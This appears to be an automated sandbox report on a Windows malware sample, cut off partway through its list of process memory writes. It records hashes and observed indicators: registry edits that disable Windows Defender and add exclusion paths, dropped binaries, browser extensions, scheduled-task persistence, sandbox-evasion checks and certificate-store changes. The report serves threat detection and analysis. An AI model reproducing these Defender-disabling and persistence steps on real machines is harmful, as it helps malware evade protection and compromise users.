Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
05/10/2022, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
1a2acd7c45d937ad3785220922543b09
-
SHA1
40d99901e46e1397c8e2dcd65dd49d438e2c597e
-
SHA256
e3d3c44e137161d9cdaa90d7ddc11e93d6503f0b5c379aa5a8c5a94964bb38dd
-
SHA512
5d9ebcd2613aeb33eeff7660cdf30b01be22094ab98d26c36065d859afc82f4c82045c168136087c135035c72b4e221bfa8a9ecc6c94bcf0bbf2a77066f47364
-
SSDEEP
196608:91OjRq12f9hGsxoXImK8GpJ+kI56Gs2BORKL0I:3O9AsJk2JMkI56GVORKL0I
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vckoWffGU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ryYNpJDBUybU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ryYNpJDBUybU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\yhlYPCkQXcaQbSVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\knLrxBGDCryPZEWZ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\knLrxBGDCryPZEWZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rJaJUqPnDsUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GvoOIxMhypioqxYUWFR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vckoWffGU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GvoOIxMhypioqxYUWFR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QrhBhAIewKJHC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rJaJUqPnDsUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\yhlYPCkQXcaQbSVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\knLrxBGDCryPZEWZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\knLrxBGDCryPZEWZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QrhBhAIewKJHC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 4 IoCs
pid Process 1712 Install.exe 1320 Install.exe 580 sFhEamk.exe 984 kWigApf.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation kWigApf.exe -
Loads dropped DLL 12 IoCs
pid Process 1668 file.exe 1712 Install.exe 1712 Install.exe 1712 Install.exe 1712 Install.exe 1320 Install.exe 1320 Install.exe 1320 Install.exe 1368 rundll32.exe 1368 rundll32.exe 1368 rundll32.exe 1368 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json kWigApf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json kWigApf.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kWigApf.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini sFhEamk.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol sFhEamk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 kWigApf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol sFhEamk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kWigApf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_1ACD2B4A039DF3260017F7BF28EE7323 kWigApf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_CD6513E45B8AAEA8DF3E8B0C926693B8 kWigApf.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kWigApf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kWigApf.exe File created C:\Program Files (x86)\ryYNpJDBUybU2\Wftzewg.xml kWigApf.exe File created C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\iBDRskQ.dll kWigApf.exe File created C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\LtkyOOB.xml kWigApf.exe File created C:\Program Files (x86)\QrhBhAIewKJHC\rJgEHpb.xml kWigApf.exe File created C:\Program Files (x86)\rJaJUqPnDsUn\saWUopD.dll kWigApf.exe File created C:\Program Files (x86)\vckoWffGU\DTSvNJ.dll kWigApf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kWigApf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja kWigApf.exe File created C:\Program Files (x86)\vckoWffGU\KZWDbLO.xml kWigApf.exe File created C:\Program Files (x86)\ryYNpJDBUybU2\mDPTCSqvVNXJQ.dll kWigApf.exe File created C:\Program Files (x86)\QrhBhAIewKJHC\ZQfdfxY.dll kWigApf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\EdnsbscYxaTlTxMBg.job schtasks.exe File created C:\Windows\Tasks\bpCIAYFeZyKMHikKBh.job schtasks.exe File created C:\Windows\Tasks\sowxjEWsCulfsCpcT.job schtasks.exe File created C:\Windows\Tasks\gxWNFYjnrIlwkwP.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe 1960 schtasks.exe 820 schtasks.exe 1480 schtasks.exe 1624 schtasks.exe 840 schtasks.exe 1832 schtasks.exe 1696 schtasks.exe 1336 schtasks.exe 972 schtasks.exe 1232 schtasks.exe 1436 schtasks.exe 1564 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" kWigApf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs kWigApf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27}\WpadNetworkName = "Network 2" kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-d8-6c-5b-31-86\WpadDecisionReason = "1" kWigApf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-d8-6c-5b-31-86\WpadDecisionTime = 10dad1e677d8d801 kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs kWigApf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 kWigApf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27}\06-d8-6c-5b-31-86 kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs kWigApf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs kWigApf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27}\WpadDecisionTime = 10dad1e677d8d801 kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27}\WpadDecision = "0" kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-d8-6c-5b-31-86 kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27} kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F804C3-6D10-431D-B2B5-224412D7FA27}\WpadDecisionReason = "1" kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-d8-6c-5b-31-86\WpadDecision = "0" kWigApf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" kWigApf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs kWigApf.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 kWigApf.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde kWigApf.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2012 powershell.EXE 2012 powershell.EXE 2012 powershell.EXE 1616 powershell.EXE 1616 powershell.EXE 1616 powershell.EXE 628 powershell.EXE 628 powershell.EXE 628 powershell.EXE 1336 powershell.EXE 1336 powershell.EXE 1336 powershell.EXE 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe 984 kWigApf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2012 powershell.EXE Token: SeDebugPrivilege 1616 powershell.EXE Token: SeDebugPrivilege 628 powershell.EXE Token: SeDebugPrivilege 1336 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1668 wrote to memory of 1712 1668 file.exe 27 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1712 wrote to memory of 1320 1712 Install.exe 28 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 556 1320 Install.exe 30 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 1320 wrote to memory of 1160 1320 Install.exe 31 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 556 wrote to memory of 980 556 forfiles.exe 33 PID 1160 wrote to memory 